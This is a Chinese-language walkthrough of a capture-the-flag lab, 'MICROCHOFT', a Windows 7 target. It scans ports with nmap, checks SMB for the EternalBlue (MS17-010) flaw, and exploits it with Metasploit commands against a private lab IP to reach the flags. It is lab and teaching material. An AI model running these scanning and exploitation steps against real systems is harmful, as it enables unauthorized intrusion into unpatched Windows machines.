The Hackers Labs MICROCHOFT靶场

admin 2024年12月25日18:40:47评论22 views字数 920阅读3分4秒阅读模式
The Hackers Labs MICROCHOFT靶场
The Hackers Labs MICROCHOFT靶场
The Hackers Labs MICROCHOFT靶场
新安全
don't give up and don't give in !
靶场官网地址:https://thehackerslabs.com/

The Hackers Labs MICROCHOFT靶场

搭建靶机你就知道这是一个windows7的一个靶场

枚举端口
nmap 192.168.109.130 -sS -sC -sV -Pn -n --min-rate 5000
  • -p- :扫描所有端口。 (65535)

  • -sS:执行TCP SYN 扫描以快速扫描哪些端口打开。

  • -sC:使用基本识别脚本执行扫描

  • -sV:执行服务扫描

  • –min-rate 5000:我们指定端口扫描速度不低于每秒 5000 个数据包,前一个参数和这个参数使扫描花费的时间更短。

  • -n:不执行 DNS 解析,我们防止扫描时间超过必要的时间。

  • -Pn:我们通过 ping 禁用主机发现。

The Hackers Labs MICROCHOFT靶场

扫描到一个445端口,进行脚本探测看他是否有windows经典的永恒之蓝漏洞

2017年5月,名为WannaCry的Rasomware被检测到,该恶意软件利用EternalBlue漏洞通过连接到内部相关设备的网络进行传播,其造成巨大影响的原因主要是由于所有Windows设备和补丁都存在该漏洞。在发现漏洞数小时后尚未发布,今天我们将检测计算机是否存在漏洞,并演示利用此漏洞是多么容易。

漏洞探测
nmap 192.168.109.130 -p 445,139,135 --script smb-vuln-ms17-010
  • --script smb-vuln-ms17-010 扫描是否有 ms17-010这个漏洞

The Hackers Labs MICROCHOFT靶场

证明了他有个永恒之蓝的漏洞

漏洞利用

命令:

msfconsolesearch ms17-010use 0set rhost 192.168.109.130run

The Hackers Labs MICROCHOFT靶场

The Hackers Labs MICROCHOFT靶场

成功拿到这个权限

The Hackers Labs MICROCHOFT靶场

寻找flag,全都在两个用户底下

The Hackers Labs MICROCHOFT靶场

The Hackers Labs MICROCHOFT靶场

总结

通过搭建靶机时给的提示,就可以自然而然的想到一些Nday漏洞,当然,在猜测这些漏洞的同时也需要去做一些验证。譬如通过对它的端口特征进行勘察等等。

The Hackers Labs MICROCHOFT靶场
END
The Hackers Labs MICROCHOFT靶场

注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):The Hackers Labs MICROCHOFT靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月25日18:40:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   The Hackers Labs MICROCHOFT靶场https://cn-sec.com/archives/3552790.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息